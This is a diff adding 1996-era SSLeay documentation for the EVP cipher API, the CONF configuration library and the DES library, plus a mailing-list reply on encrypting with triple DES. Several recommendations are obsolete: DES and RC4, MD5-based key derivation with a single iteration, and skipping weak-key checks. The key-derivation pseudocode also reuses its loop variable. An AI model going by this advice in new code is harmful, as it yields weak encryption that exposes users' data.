+EVP_CIPHER *EVP_des_ede_cbc(); /* DES in cbc ede mode, iv=8, block=8, key=16 */
+EVP_CIPHER *EVP_des_ede3_cbc();/* DES in cbc ede mode, iv=8, block=8, key=24 */
+EVP_CIPHER *EVP_desx_cbc();    /* DES in desx cbc mode,iv=8, block=8, key=24 */
+EVP_CIPHER *EVP_rc4();         /* RC4,                 iv=0, block=1, key=16 */
+EVP_CIPHER *EVP_idea_ecb();    /* IDEA in ecb mode,    iv=0, block=8, key=16 */
+EVP_CIPHER *EVP_idea_cfb();    /* IDEA in cfb mode,    iv=8, block=1, key=16 */
+EVP_CIPHER *EVP_idea_ofb();    /* IDEA in ofb mode,    iv=8, block=1, key=16 */
+EVP_CIPHER *EVP_idea_cbc();    /* IDEA in cbc mode,    iv=8, block=8, key=16 */
+EVP_CIPHER *EVP_rc2_ecb();     /* RC2 in ecb mode,     iv=0, block=8, key=16 */
+EVP_CIPHER *EVP_rc2_cfb();     /* RC2 in cfb mode,     iv=8, block=1, key=16 */
+EVP_CIPHER *EVP_rc2_ofb();     /* RC2 in ofb mode,     iv=8, block=1, key=16 */
+EVP_CIPHER *EVP_rc2_cbc();     /* RC2 in cbc mode,     iv=8, block=8, key=16 */
+EVP_CIPHER *EVP_bf_ecb();      /* Blowfish in ecb mode,iv=0, block=8, key=16 */
+EVP_CIPHER *EVP_bf_cfb();      /* Blowfish in cfb mode,iv=8, block=1, key=16 */
+EVP_CIPHER *EVP_bf_ofb();      /* Blowfish in ofb mode,iv=8, block=1, key=16 */
+EVP_CIPHER *EVP_bf_cbc();      /* Blowfish in cbc mode,iv=8, block=8, key=16 */
+
+The meaning of the compound names is as follows.
+des	The base cipher is DES.
+idea	The base cipher is IDEA
+rc4	The base cipher is RC4-128
+rc2	The base cipher is RC2-128
+ecb	Electronic Code Book form of the cipher.
+cbc	Cipher Block Chaining form of the cipher.
+cfb	64 bit Cipher Feedback form of the cipher.
+ofb	64 bit Output Feedback form of the cipher.
+ede	The cipher is used in Encrypt, Decrypt, Encrypt mode.  The first
+	and last keys are the same.
+ede3	The cipher is used in Encrypt, Decrypt, Encrypt mode.
+
+All the Cipher routines take a EVP_CIPHER_CTX pointer as an argument.
+The state of the cipher is kept in this structure.
+
+typedef struct EVP_CIPHER_Ctx_st
+	{
+	EVP_CIPHER *cipher;
+	int encrypt;		/* encrypt or decrypt */
+	int buf_len;		/* number we have left */
+	unsigned char buf[8];
+	union	{
+		.... /* cipher specific stuff */
+		} c;
+	} EVP_CIPHER_CTX;
+
+Cipher is a pointer the the EVP_CIPHER for the current context.  The encrypt
+flag indicates encryption or decryption.  buf_len is the number of bytes
+currently being held in buf.
+The 'c' union holds the cipher specify context.
+
+The following functions are to be used.
+
+int EVP_read_pw_string(
+char *buf,
+int len,
+char *prompt,
+int verify,
+	This function is the same as des_read_pw_string() (des.doc).
+
+void EVP_set_pw_prompt(char *prompt);
+	This function sets the 'default' prompt to use to use in
+	EVP_read_pw_string when the prompt parameter is NULL.  If the
+	prompt parameter is NULL, this 'default prompt' feature is turned
+	off.  Be warned, this is a global variable so weird things
+	will happen if it is used under Win16 and care must be taken
+	with a multi-threaded version of the library.
+
+char *EVP_get_pw_prompt();
+	This returns a pointer to the default prompt string.  NULL
+	if it is not set.
+
+int EVP_BytesToKey(
+EVP_CIPHER *type,
+EVP_MD *md,
+unsigned char *salt,
+unsigned char *data,
+int datal,
+int count,
+unsigned char *key,
+unsigned char *iv);
+	This function is used to generate a key and an initialisation vector
+	for a specified cipher from a key string and a salt.  Type
+	specifies the cipher the 'key' is being generated for.  Md is the
+	message digest algorithm to use to generate the key and iv.  The salt
+	is an optional 8 byte object that is used to help seed the key
+	generator.
+	If the salt value is NULL, it is just not used.  Datal is the
+	number of bytes to use from 'data' in the key generation.  
+	This function returns the key size for the specified cipher, if
+	data is NULL, this value is returns and no other
+	computation is performed.  Count is
+	the number of times to loop around the key generator.  I would
+	suggest leaving it's value as 1.  Key and iv are the structures to
+	place the returning iv and key in.  If they are NULL, no value is
+	generated for that particular value.
+	The algorithm used is as follows
+	
+	/* M[] is an array of message digests
+	 * MD() is the message digest function */
+	M[0]=MD(data . salt);
+	for (i=1; i<count; i++) M[0]=MD(M[0]);
+
+	i=1
+	while (data still needed for key and iv)
+		{
+		M[i]=MD(M[i-1] . data . salt);
+		for (i=1; i<count; i++) M[i]=MD(M[i]);
+		i++;
+		}
+
+	If the salt is NULL, it is not used.
+	The digests are concatenated together.
+	M = M[0] . M[1] . M[2] .......
+
+	For key= 8, iv=8 => key=M[0.. 8], iv=M[ 9 .. 16].
+	For key=16, iv=0 => key=M[0..16].
+	For key=16, iv=8 => key=M[0..16], iv=M[17 .. 24].
+	For key=24, iv=8 => key=M[0..24], iv=M[25 .. 32].
+
+	This routine will produce DES-CBC keys and iv that are compatible
+	with the PKCS-5 standard when md2 or md5 are used.  If md5 is
+	used, the salt is NULL and count is 1, this routine will produce
+	the password to key mapping normally used with RC4.
+	I have attempted to logically extend the PKCS-5 standard to
+	generate keys and iv for ciphers that require more than 16 bytes,
+	if anyone knows what the correct standard is, please inform me.
+	When using sha or sha1, things are a bit different under this scheme,
+	since sha produces a 20 byte digest.  So for ciphers requiring
+	24 bits of data, 20 will come from the first MD and 4 will
+	come from the second.
+
+	I have considered having a separate function so this 'routine'
+	can be used without the requirement of passing a EVP_CIPHER *,
+	but I have decided to not bother.  If you wish to use the
+	function without official EVP_CIPHER structures, just declare
+	a local one and set the key_len and iv_len fields to the
+	length you desire.
+
+The following routines perform encryption and decryption 'by parts'.  By
+this I mean that there are groups of 3 routines.  An Init function that is
+used to specify a cipher and initialise data structures.  An Update routine
+that does encryption/decryption, one 'chunk' at a time.  And finally a
+'Final' function that finishes the encryption/decryption process.
+All these functions take a EVP_CIPHER pointer to specify which cipher to
+encrypt/decrypt with.  They also take a EVP_CIPHER_CTX object as an
+argument.  This structure is used to hold the state information associated
+with the operation in progress.
+
+void EVP_EncryptInit(
+EVP_CIPHER_CTX *ctx,
+EVP_CIPHER *type,
+unsigned char *key,
+unsigned char *iv);
+	This function initialise a EVP_CIPHER_CTX for encryption using the
+	cipher passed in the 'type' field.  The cipher is initialised to use
+	'key' as the key and 'iv' for the initialisation vector (if one is
+	required).  If the type, key or iv is NULL, the value currently in the
+	EVP_CIPHER_CTX is reused.  So to perform several decrypt
+	using the same cipher, key and iv, initialise with the cipher,
+	key and iv the first time and then for subsequent calls,
+	reuse 'ctx' but pass NULL for type, key and iv.  You must make sure
+	to pass a key that is large enough for a particular cipher.  I
+	would suggest using the EVP_BytesToKey() function.
+
+void EVP_EncryptUpdate(
+EVP_CIPHER_CTX *ctx,
+unsigned char *out,
+int *outl,
+unsigned char *in,
+int inl);
+	This function takes 'inl' bytes from 'in' and outputs bytes
+	encrypted by the cipher 'ctx' was initialised with into 'out'.  The
+	number of bytes written to 'out' is put into outl.  If a particular
+	cipher encrypts in blocks, less or more bytes than input may be
+	output.  Currently the largest block size used by supported ciphers
+	is 8 bytes, so 'out' should have room for 'inl+7' bytes.  Normally
+	EVP_EncryptInit() is called once, followed by lots and lots of
+	calls to EVP_EncryptUpdate, followed by a single EVP_EncryptFinal
+	call.
+
+void EVP_EncryptFinal(
+EVP_CIPHER_CTX *ctx,
+unsigned char *out,
+int *outl);
+	Because quite a large number of ciphers are block ciphers, there is
+	often an incomplete block to write out at the end of the
+	encryption.  EVP_EncryptFinal() performs processing on this last
+	block.  The last block in encoded in such a way that it is possible
+	to determine how many bytes in the last block are valid.  For 8 byte
+	block size ciphers, if only 5 bytes in the last block are valid, the
+	last three bytes will be filled with the value 3.  If only 2 were
+	valid, the other 6 would be filled with sixes.  If all 8 bytes are
+	valid, a extra 8 bytes are appended to the cipher stream containing
+	nothing but 8 eights.  These last bytes are output into 'out' and
+	the number of bytes written is put into 'outl'  These last bytes
+	are output into 'out' and the number of bytes written is put into
+	'outl'.  This form of block cipher finalisation is compatible with
+	PKCS-5.  Please remember that even if you are using ciphers like
+	RC4 that has no blocking and so the function will not write
+	anything into 'out', it would still be a good idea to pass a
+	variable for 'out' that can hold 8 bytes just in case the cipher is
+	changed some time in the future.  It should also be remembered
+	that the EVP_CIPHER_CTX contains the password and so when one has
+	finished encryption with a particular EVP_CIPHER_CTX, it is good
+	practice to zero the structure 
+	(ie. memset(ctx,0,sizeof(EVP_CIPHER_CTX)).
+	
+void EVP_DecryptInit(
+EVP_CIPHER_CTX *ctx,
+EVP_CIPHER *type,
+unsigned char *key,
+unsigned char *iv);
+	This function is basically the same as EVP_EncryptInit() accept that
+	is prepares the EVP_CIPHER_CTX for decryption.
+
+void EVP_DecryptUpdate(
+EVP_CIPHER_CTX *ctx,
+unsigned char *out,
+int *outl,
+unsigned char *in,
+int inl);
+	This function is basically the same as EVP_EncryptUpdate()
+	except that it performs decryption.  There is one
+	fundamental difference though.  'out' can not be the same as
+	'in' for any ciphers with a block size greater than 1 if more
+	than one call to EVP_DecryptUpdate() will be made.  This
+	is because this routine can hold a 'partial' block between
+	calls.  When a partial block is decrypted (due to more bytes
+	being passed via this function, they will be written to 'out'
+	overwriting the input bytes in 'in' that have not been read
+	yet.  From this it should also be noted that 'out' should
+	be at least one 'block size' larger than 'inl'.  This problem
+	only occurs on the second and subsequent call to
+	EVP_DecryptUpdate() when using a block cipher.
+
+int EVP_DecryptFinal(
+EVP_CIPHER_CTX *ctx,
+unsigned char *out,
+int *outl);
+	This function is different to EVP_EncryptFinal in that it 'removes'
+	any padding bytes appended when the data was encrypted.  Due to the
+	way in which 1 to 8 bytes may have been appended when encryption
+	using a block cipher, 'out' can end up with 0 to 7 bytes being put
+	into it.  When decoding the padding bytes, it is possible to detect
+	an incorrect decryption.  If the decryption appears to be wrong, 0
+	is returned.  If everything seems ok, 1 is returned.  For ciphers
+	with a block size of 1 (RC4), this function would normally not
+	return any bytes and would always return 1.  Just because this
+	function returns 1 does not mean the decryption was correct. It
+	would normally be wrong due to either the wrong key/iv or
+	corruption of the cipher data fed to EVP_DecryptUpdate().
+	As for EVP_EncryptFinal, it is a good idea to zero the
+	EVP_CIPHER_CTX after use since the structure contains the key used
+	to decrypt the data.
+	
+The following Cipher routines are convenience routines that call either
+EVP_EncryptXxx or EVP_DecryptXxx depending on weather the EVP_CIPHER_CTX
+was setup to encrypt or decrypt.  
+
+void EVP_CipherInit(
+EVP_CIPHER_CTX *ctx,
+EVP_CIPHER *type,
+unsigned char *key,
+unsigned char *iv,
+int enc);
+	This function take arguments that are the same as EVP_EncryptInit()
+	and EVP_DecryptInit() except for the extra 'enc' flag.  If 1, the
+	EVP_CIPHER_CTX is setup for encryption, if 0, decryption.
+
+void EVP_CipherUpdate(
+EVP_CIPHER_CTX *ctx,
+unsigned char *out,
+int *outl,
+unsigned char *in,
+int inl);
+	Again this function calls either EVP_EncryptUpdate() or
+	EVP_DecryptUpdate() depending on state in the 'ctx' structure.
+	As noted for EVP_DecryptUpdate(), when this routine is used
+	for decryption with block ciphers, 'out' should not be the
+	same as 'in'.
+
+int EVP_CipherFinal(
+EVP_CIPHER_CTX *ctx,
+unsigned char *outm,
+int *outl);
+	This routine call EVP_EncryptFinal() or EVP_DecryptFinal()
+	depending on the state information in 'ctx'.  1 is always returned
+	if the mode is encryption, otherwise the return value is the return
+	value of EVP_DecryptFinal().
+
+==== cipher.m ========================================================
+
+Date: Tue, 15 Oct 1996 08:16:14 +1000 (EST)
+From: Eric Young <eay@mincom.com>
+X-Sender: eay@orb
+To: Roland Haring <rharing@tandem.cl>
+Cc: ssl-users@mincom.com
+Subject: Re: Symmetric encryption with ssleay
+In-Reply-To: <m0vBpyq-00001aC@tandemnet.tandem.cl>
+Message-Id: <Pine.SOL.3.91.961015075623.11394A-100000@orb>
+Mime-Version: 1.0
+Content-Type: TEXT/PLAIN; charset=US-ASCII
+Sender: ssl-lists-owner@mincom.com
+Precedence: bulk
+Status: RO
+X-Status: 
+
+On Fri, 11 Oct 1996, Roland Haring wrote:
+> THE_POINT:
+> 	Would somebody be so kind to give me the minimum basic 
+> 	calls I need to do to libcrypto.a to get some text encrypted
+> 	and decrypted again? ...hopefully with code included to do
+> 	base64 encryption and decryption ... e.g. that sign-it.c code
+> 	posted some while ago was a big help :-) (please, do not point
+> 	me to apps/enc.c where I suspect my Heissenbug to be hidden :-)
+
+Ok, the base64 encoding stuff in 'enc.c' does the wrong thing sometimes 
+when the data is less than a line long (this is for decoding).  I'll dig 
+up the exact fix today and post it.  I am taking longer on 0.6.5 than I 
+intended so I'll just post this patch.
+
+The documentation to read is in
+doc/cipher.doc,
+doc/encode.doc (very sparse :-).
+and perhaps
+doc/digest.doc,
+
+The basic calls to encrypt with say triple DES are
+
+Given
+char key[EVP_MAX_KEY_LENGTH];
+char iv[EVP_MAX_IV_LENGTH];
+EVP_CIPHER_CTX ctx;
+unsigned char out[512+8];
+int outl;
+
+/* optional generation of key/iv data from text password using md5
+ * via an upward compatable verson of PKCS#5. */
+EVP_BytesToKey(EVP_des_ede3_cbc,EVP_md5,NULL,passwd,strlen(passwd),
+	key,iv);
+
+/* Initalise the EVP_CIPHER_CTX */
+EVP_EncryptInit(ctx,EVP_des_ede3_cbc,key,iv);
+
+while (....)
+	{
+	/* This is processing 512 bytes at a time, the bytes are being
+	 * copied into 'out', outl bytes are output.  'out' should not be the
+	 * same as 'in' for reasons mentioned in the documentation. */
+	EVP_EncryptUpdate(ctx,out,&outl,in,512);
+	}
+
+/* Output the last 'block'.  If the cipher is a block cipher, the last
+ * block is encoded in such a way so that a wrong decryption will normally be
+ * detected - again, one of the PKCS standards. */
+
+EVP_EncryptFinal(ctx,out,&outl);
+
+To decrypt, use the EVP_DecryptXXXXX functions except that EVP_DecryptFinal()
+will return 0 if the decryption fails (only detectable on block ciphers).
+
+You can also use
+EVP_CipherInit()
+EVP_CipherUpdate()
+EVP_CipherFinal()
+which does either encryption or decryption depending on an extra 
+parameter to EVP_CipherInit().
+
+
+To do the base64 encoding,
+EVP_EncodeInit()
+EVP_EncodeUpdate()
+EVP_EncodeFinal()
+
+EVP_DecodeInit()
+EVP_DecodeUpdate()
+EVP_DecodeFinal()
+
+where the encoding is quite simple, but the decoding can be a bit more 
+fun (due to dud input).
+
+EVP_DecodeUpdate() returns -1 for an error on an input line, 0 if the 
+'last line' was just processed, and 1 if more lines should be submitted.
+
+EVP_DecodeFinal() returns -1 for an error or 1 if things are ok.
+
+So the loop becomes
+EVP_DecodeInit(....)
+for (;;)
+	{
+	i=EVP_DecodeUpdate(....);
+	if (i < 0) goto err;
+
+	/* process the data */
+
+	if (i == 0) break;
+	}
+EVP_DecodeFinal(....);
+/* process the data */
+
+The problem in 'enc.c' is that I was stuff the processing up after the 
+EVP_DecodeFinal(...) when the for(..) loop was not being run (one line of 
+base64 data) and this was because 'enc.c' tries to scan over a file until
+it hits the first valid base64 encoded line.
+
+hope this helps a bit.
+eric
+--
+Eric Young                  | BOOL is tri-state according to Bill Gates.
+AARNet: eay@mincom.oz.au    | RTFM Win32 GetMessage().
+
+==== conf.doc ========================================================
+
+The CONF library.
+
+The CONF library is a simple set of routines that can be used to configure
+programs.  It is a superset of the genenv() function with some extra
+structure.
+
+The library consists of 5 functions.
+
+LHASH *CONF_load(LHASH *config,char *file);
+This function is called to load in a configuration file.  Multiple
+configuration files can be loaded, with each subsequent 'load' overwriting
+any already defined 'variables'.  If there is an error, NULL is returned.
+If config is NULL, a new LHASH structure is created and returned, otherwise
+the new data in the 'file' is loaded into the 'config' structure.
+
+void CONF_free(LHASH *config);
+This function free()s the data in config.
+
+char *CONF_get_string(LHASH *config,char *section,char *name);
+This function returns the string found in 'config' that corresponds to the
+'section' and 'name' specified.  Classes and the naming system used will be
+discussed later in this document.  If the variable is not defined, an NULL
+is returned.
+
+long CONF_get_long(LHASH *config,char *section, char *name);
+This function is the same as CONF_get_string() except that it converts the
+string to an long and returns it.  If variable is not a number or the
+variable does not exist, 0 is returned.  This is a little problematic but I
+don't know of a simple way around it.
+
+STACK *CONF_get_section(LHASH *config, char *section);
+This function returns a 'stack' of CONF_VALUE items that are all the
+items defined in a particular section.  DO NOT free() any of the
+variable returned.  They will disappear when CONF_free() is called.
+
+The 'lookup' model.
+The configuration file is divided into 'sections'.  Each section is started by
+a line of the form '[ section ]'.  All subsequent variable definitions are
+of this section.  A variable definition is a simple alpha-numeric name
+followed by an '=' and then the data.  A section or variable name can be
+described by a regular expression of the following form '[A-Za-z0-9_]+'.
+The value of the variable is the text after the '=' until the end of the
+line, stripped of leading and trailing white space.
+At this point I should mention that a '#' is a comment character, \ is the
+escape character, and all three types of quote can be used to stop any
+special interpretation of the data.
+Now when the data is being loaded, variable expansion can occur.  This is
+done by expanding any $NAME sequences into the value represented by the
+variable NAME.  If the variable is not in the current section, the different
+section can be specified by using the $SECTION::NAME form.  The ${NAME} form
+also works and is very useful for expanding variables inside strings.
+
+When a variable is looked up, there are 2 special section. 'default', which
+is the initial section, and 'ENV' which is the processes environment
+variables (accessed via getenv()).  When a variable is looked up, it is
+first 'matched' with it's section (if one was specified), if this fails, the
+'default' section is matched.
+If the 'lhash' variable passed was NULL, the environment is searched.
+
+Now why do we bother with sections?  So we can have multiple programs using
+the same configuration file, or multiple instances of the same program
+using different variables.  It also provides a nice mechanism to override
+the processes environment variables (eg ENV::HOME=/tmp).  If there is a
+program specific variable missing, we can have default values.
+Multiple configuration files can be loaded, with each new value clearing
+any predefined values.  A system config file can provide 'default' values,
+and application/usr specific files can provide overriding values.
+
+Examples
+
+# This is a simple example
+SSLEAY_HOME	= /usr/local/ssl
+ENV::PATH	= $SSLEAY_HOME/bin:$PATH	# override my path
+
+[X509]
+cert_dir	= $SSLEAY_HOME/certs	# /usr/local/ssl/certs
+
+[SSL]
+CIPHER		= DES-EDE-MD5:RC4-MD5
+USER_CERT	= $HOME/${USER}di'r 5'	# /home/eay/eaydir 5
+USER_CERT	= $HOME/\${USER}di\'r	# /home/eay/${USER}di'r
+USER_CERT	= "$HOME/${US"ER}di\'r	# $HOME/${USER}di'r
+
+TEST		= 1234\
+5678\
+9ab					# TEST=123456789ab
+TTT		= 1234\n\n		# TTT=1234<nl><nl>
+
+
+
+==== des.doc ========================================================
+
+The DES library.
+
+Please note that this library was originally written to operate with
+eBones, a version of Kerberos that had had encryption removed when it left
+the USA and then put back in.  As such there are some routines that I will
+advise not using but they are still in the library for historical reasons.
+For all calls that have an 'input' and 'output' variables, they can be the
+same.
+
+This library requires the inclusion of 'des.h'.
+
+All of the encryption functions take what is called a des_key_schedule as an 
+argument.  A des_key_schedule is an expanded form of the des key.
+A des_key is 8 bytes of odd parity, the type used to hold the key is a
+des_cblock.  A des_cblock is an array of 8 bytes, often in this library
+description I will refer to input bytes when the function specifies
+des_cblock's as input or output, this just means that the variable should
+be a multiple of 8 bytes.
+
+The define DES_ENCRYPT is passed to specify encryption, DES_DECRYPT to
+specify decryption.  The functions and global variable are as follows:
+
+int des_check_key;
+	DES keys are supposed to be odd parity.  If this variable is set to
+	a non-zero value, des_set_key() will check that the key has odd
+	parity and is not one of the known weak DES keys.  By default this
+	variable is turned off;
+	
+void des_set_odd_parity(
+des_cblock *key );
+	This function takes a DES key (8 bytes) and sets the parity to odd.
+	
+int des_is_weak_key(
+des_cblock *key );
+	This function returns a non-zero value if the DES key passed is a
+	weak, DES key.  If it is a weak key, don't use it, try a different
+	one.  If you are using 'random' keys, the chances of hitting a weak
+	key are 1/2^52 so it is probably not worth checking for them.
+	
+int des_set_key(
+des_cblock *key,
+des_key_schedule schedule);
+	Des_set_key converts an 8 byte DES key into a des_key_schedule.
+	A des_key_schedule is an expanded form of the key which is used to
+	perform actual encryption.  It can be regenerated from the DES key
+	so it only needs to be kept when encryption or decryption is about
+	to occur.  Don't save or pass around des_key_schedule's since they
+	are CPU architecture dependent, DES keys are not.  If des_check_key
+	is non zero, zero is returned if the key has the wrong parity or
+	the key is a weak key, else 1 is returned.
+	
+int des_key_sched(
+des_cblock *key,
+des_key_schedule schedule);
+	An alternative name for des_set_key().
+
+int des_rw_mode;		/* defaults to DES_PCBC_MODE */
+	This flag holds either DES_CBC_MODE or DES_PCBC_MODE (default).
+	This specifies the function to use in the enc_read() and enc_write()
+	functions.
+
+void des_encrypt(
+unsigned long *data,
+des_key_schedule ks,
+int enc);
+	This is the DES encryption function that gets called by just about
+	every other DES routine in the library.  You should not use this
+	function except to implement 'modes' of DES.  I say this because the
+	functions that call this routine do the conversion from 'char *' to
+	long, and this needs to be done to make sure 'non-aligned' memory
+	access do not occur.  The characters are loaded 'little endian',
+	have a look at my source code for more details on how I use this
+	function.
+	Data is a pointer to 2 unsigned long's and ks is the
+	des_key_schedule to use.  enc, is non zero specifies encryption,
+	zero if decryption.
+
+void des_encrypt2(
+unsigned long *data,
+des_key_schedule ks,
+int enc);
+	This functions is the same as des_encrypt() except that the DES
+	initial permutation (IP) and final permutation (FP) have been left
+	out.  As for des_encrypt(), you should not use this function.
+	It is used by the routines in my library that implement triple DES.
+	IP() des_encrypt2() des_encrypt2() des_encrypt2() FP() is the same
+	as des_encrypt() des_encrypt() des_encrypt() except faster :-).
+
+void des_ecb_encrypt(
+des_cblock *input,
+des_cblock *output,
+des_key_schedule ks,
+int enc);
+	This is the basic Electronic Code Book form of DES, the most basic
+	form.  Input is encrypted into output using the key represented by
+	ks.  If enc is non zero (DES_ENCRYPT), encryption occurs, otherwise
+	decryption occurs.  Input is 8 bytes long and output is 8 bytes.
+	(the des_cblock structure is 8 chars).
+	
+void des_ecb3_encrypt(
+des_cblock *input,
+des_cblock *output,
+des_key_schedule ks1,
+des_key_schedule ks2,
+des_key_schedule ks3,
+int enc);
+	This is the 3 key EDE mode of ECB DES.  What this means is that 
+	the 8 bytes of input is encrypted with ks1, decrypted with ks2 and
+	then encrypted again with ks3, before being put into output;
+	C=E(ks3,D(ks2,E(ks1,M))).  There is a macro, des_ecb2_encrypt()
+	that only takes 2 des_key_schedules that implements,
+	C=E(ks1,D(ks2,E(ks1,M))) in that the final encrypt is done with ks1.
+	
+void des_cbc_encrypt(
+des_cblock *input,
+des_cblock *output,
+long length,
+des_key_schedule ks,
+des_cblock *ivec,
+int enc);
+	This routine implements DES in Cipher Block Chaining mode.
+	Input, which should be a multiple of 8 bytes is encrypted
+	(or decrypted) to output which will also be a multiple of 8 bytes.
+	The number of bytes is in length (and from what I've said above,
+	should be a multiple of 8).  If length is not a multiple of 8, I'm
+	not being held responsible :-).  ivec is the initialisation vector.
+	This function does not modify this variable.  To correctly implement
+	cbc mode, you need to do one of 2 things; copy the last 8 bytes of
+	cipher text for use as the next ivec in your application,
+	or use des_ncbc_encrypt(). 
+	Only this routine has this problem with updating the ivec, all
+	other routines that are implementing cbc mode update ivec.
+	
+void des_ncbc_encrypt(
+des_cblock *input,
+des_cblock *output,
+long length,
+des_key_schedule sk,
+des_cblock *ivec,
+int enc);
+	For historical reasons, des_cbc_encrypt() did not update the
+	ivec with the value requires so that subsequent calls to
+	des_cbc_encrypt() would 'chain'.  This was needed so that the same
+	'length' values would not need to be used when decrypting.
+	des_ncbc_encrypt() does the right thing.  It is the same as
+	des_cbc_encrypt accept that ivec is updates with the correct value
+	to pass in subsequent calls to des_ncbc_encrypt().  I advise using
+	des_ncbc_encrypt() instead of des_cbc_encrypt();
+
+void des_xcbc_encrypt(
+des_cblock *input,
+des_cblock *output,
+long length,
+des_key_schedule sk,
+des_cblock *ivec,
+des_cblock *inw,
+des_cblock *outw,
+int enc);
+	This is RSA's DESX mode of DES.  It uses inw and outw to
+	'whiten' the encryption.  inw and outw are secret (unlike the iv)
+	and are as such, part of the key.  So the key is sort of 24 bytes.
+	This is much better than cbc des.
+	
+void des_3cbc_encrypt(
+des_cblock *input,
+des_cblock *output,
+long length,
+des_key_schedule sk1,
+des_key_schedule sk2,
+des_cblock *ivec1,
+des_cblock *ivec2,
+int enc);
+	This function is flawed, do not use it.  I have left it in the
+	library because it is used in my des(1) program and will function
+	correctly when used by des(1).  If I removed the function, people
+	could end up unable to decrypt files.
+	This routine implements outer triple cbc encryption using 2 ks and
+	2 ivec's.  Use des_ede2_cbc_encrypt() instead.
+	
+void des_ede3_cbc_encrypt(
+des_cblock *input,
+des_cblock *output, 
+long length,
+des_key_schedule ks1,
+des_key_schedule ks2, 
+des_key_schedule ks3, 
+des_cblock *ivec,
+int enc);
+	This function implements outer triple CBC DES encryption with 3
+	keys.  What this means is that each 'DES' operation
+	inside the cbc mode is really an C=E(ks3,D(ks2,E(ks1,M))).
+	Again, this is cbc mode so an ivec is requires.
+	This mode is used by SSL.
+	There is also a des_ede2_cbc_encrypt() that only uses 2
+	des_key_schedule's, the first being reused for the final
+	encryption.  C=E(ks1,D(ks2,E(ks1,M))).  This form of triple DES
+	is used by the RSAref library.
+	
+void des_pcbc_encrypt(
+des_cblock *input,
+des_cblock *output,
+long length,
+des_key_schedule ks,
+des_cblock *ivec,
+int enc);
+	This is Propagating Cipher Block Chaining mode of DES.  It is used
+	by Kerberos v4.  It's parameters are the same as des_ncbc_encrypt().
+	
+void des_cfb_encrypt(
+unsigned char *in,
+unsigned char *out,
+int numbits,
+long length,
+des_key_schedule ks,
+des_cblock *ivec,
+int enc);
+	Cipher Feedback Back mode of DES.  This implementation 'feeds back'
+	in numbit blocks.  The input (and output) is in multiples of numbits
+	bits.  numbits should to be a multiple of 8 bits.  Length is the
+	number of bytes input.  If numbits is not a multiple of 8 bits,
+	the extra bits in the bytes will be considered padding.  So if
+	numbits is 12, for each 2 input bytes, the 4 high bits of the
+	second byte will be ignored.  So to encode 72 bits when using
+	a numbits of 12 take 12 bytes.  To encode 72 bits when using
+	numbits of 9 will take 16 bytes.  To encode 80 bits when using
+	numbits of 16 will take 10 bytes. etc, etc.  This padding will
+	apply to both input and output.
+
+	
+void des_cfb64_encrypt(
+unsigned char *in,
+unsigned char *out,
+long length,
+des_key_schedule ks,
+des_cblock *ivec,
+int *num,
+int enc);
+	This is one of the more useful functions in this DES library, it
+	implements CFB mode of DES with 64bit feedback.  Why is this
+	useful you ask?  Because this routine will allow you to encrypt an
+	arbitrary number of bytes, no 8 byte padding.  Each call to this
+	routine will encrypt the input bytes to output and then update ivec
+	and num.  num contains 'how far' we are though ivec.  If this does
+	not make much sense, read more about cfb mode of DES :-).
+	
+void des_ede3_cfb64_encrypt(
+unsigned char *in,
+unsigned char *out,
+long length,
+des_key_schedule ks1,
+des_key_schedule ks2,
+des_key_schedule ks3,
+des_cblock *ivec,
+int *num,
+int enc);
+	Same as des_cfb64_encrypt() accept that the DES operation is
+	triple DES.  As usual, there is a macro for
+	des_ede2_cfb64_encrypt() which reuses ks1.
+
+void des_ofb_encrypt(
+unsigned char *in,
+unsigned char *out,
+int numbits,
+long length,
+des_key_schedule ks,
+des_cblock *ivec);
+	This is a implementation of Output Feed Back mode of DES.  It is
+	the same as des_cfb_encrypt() in that numbits is the size of the
+	units dealt with during input and output (in bits).
+	
+void des_ofb64_encrypt(
+unsigned char *in,
+unsigned char *out,
+long length,
+des_key_schedule ks,
+des_cblock *ivec,
+int *num);
+	The same as des_cfb64_encrypt() except that it is Output Feed Back
+	mode.
+
+void des_ede3_ofb64_encrypt(
+unsigned char *in,
+unsigned char *out,
+long length,
+des_key_schedule ks1,
+des_key_schedule ks2,
+des_key_schedule ks3,
+des_cblock *ivec,
+int *num);
+	Same as des_ofb64_encrypt() accept that the DES operation is
+	triple DES.  As usual, there is a macro for
+	des_ede2_ofb64_encrypt() which reuses ks1.
+
+int des_read_pw_string(
+char *buf,
+int length,
+char *prompt,
+int verify);
+	This routine is used to get a password from the terminal with echo
+	turned off.  Buf is where the string will end up and length is the
+	size of buf.  Prompt is a string presented to the 'user' and if
+	verify is set, the key is asked for twice and unless the 2 copies
+	match, an error is returned.  A return code of -1 indicates a
+	system error, 1 failure due to use interaction, and 0 is success.
+
+unsigned long des_cbc_cksum(
+des_cblock *input,
+des_cblock *output,
+long length,
+des_key_schedule ks,
+des_cblock *ivec);
+	This function produces an 8 byte checksum from input that it puts in
+	output and returns the last 4 bytes as a long.  The checksum is
+	generated via cbc mode of DES in which only the last 8 byes are
+	kept.  I would recommend not using this function but instead using
+	the EVP_Digest routines, or at least using MD5 or SHA.  This
+	function is used by Kerberos v4 so that is why it stays in the
+	library.
+	
+char *des_fcrypt(
+const char *buf,
+const char *salt
+char *ret);
+	This is my fast version of the unix crypt(3) function.  This version
+	takes only a small amount of space relative to other fast
+	crypt() implementations.  This is different to the normal crypt
+	in that the third parameter is the buffer that the return value
+	is written into.  It needs to be at least 14 bytes long.  This
+	function is thread safe, unlike the normal crypt.
+
+char *crypt(
+const char *buf,
+const char *salt);
+	This function calls des_fcrypt() with a static array passed as the
+	third parameter.  This emulates the normal non-thread safe semantics
+	of crypt(3).
+
+void des_string_to_key(
+char *str,
+des_cblock *key);
+	This function takes str and converts it into a DES key.  I would
+	recommend using MD5 instead and use the first 8 bytes of output.
+	When I wrote the first version of these routines back in 1990, MD5
+	did not exist but I feel these routines are still sound.  This
+	routines is compatible with the one in MIT's libdes.
+	
+void des_string_to_2keys(
+char *str,
+des_cblock *key1,
+des_cblock *key2);
+	This function takes str and converts it into 2 DES keys.
+	I would recommend using MD5 and using the 16 bytes as the 2 keys.
+	I have nothing against these 2 'string_to_key' routines, it's just
+	that if you say that your encryption key is generated by using the
+	16 bytes of an MD5 hash, every-one knows how you generated your
+	keys.
+
+int des_read_password(
+des_cblock *key,
+char *prompt,
+int verify);
+	This routine combines des_read_pw_string() with des_string_to_key().
+
+int des_read_2passwords(
+des_cblock *key1,
+des_cblock *key2,
+char *prompt,
+int verify);
+	This routine combines des_read_pw_string() with des_string_to_2key().
+
+void des_random_seed(
+des_cblock key);
